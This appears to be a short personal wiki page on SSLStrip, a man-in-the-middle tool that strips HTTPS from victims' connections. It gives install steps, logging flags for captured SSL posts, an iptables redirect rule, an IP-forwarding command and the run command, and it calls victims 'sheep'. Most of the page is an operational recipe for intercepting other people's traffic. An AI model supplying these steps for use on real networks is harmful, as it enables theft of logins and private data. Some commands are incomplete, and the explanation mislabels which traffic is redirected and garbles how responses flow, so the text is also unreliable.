From charlesreid1

A tool from Moxie Marlinspike

Also see SSLSniff


Source Code


Moxie's page:


On Kali:

$ apt-get install sslstrip

On other:

$ git clone
$ cd sslstrip
$ python build && python install

Getting Help

$ sslstrip -h

Important tags:

-w - specifies log file

-p - logs only SSL posts

-a - logs all SSL and HTTP traffic

-l port - port to listen on

Basic Usage

SSLStrip listens for traffic on a particular port, so we need to use Iptables to listen for HTTPS traffic and forward it selectively to SSLStrip. We'll assume SSLStrip is running on port 6666.

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Now any HTTPS connections made to it are turned into HTTP connections, and their encryption layer stripped. SSLStrip also keeps track of which requests have been stripped, so that when the HTTP response from the sheep is received, it is forwarded along to the server as an HTTPS response.

Also make sure your machine forwards packets it receives:

$ echo "1" > /proc/sys/net/ipv4/ip_forward

Now run sslstrip:

$ sslstrip -l 6666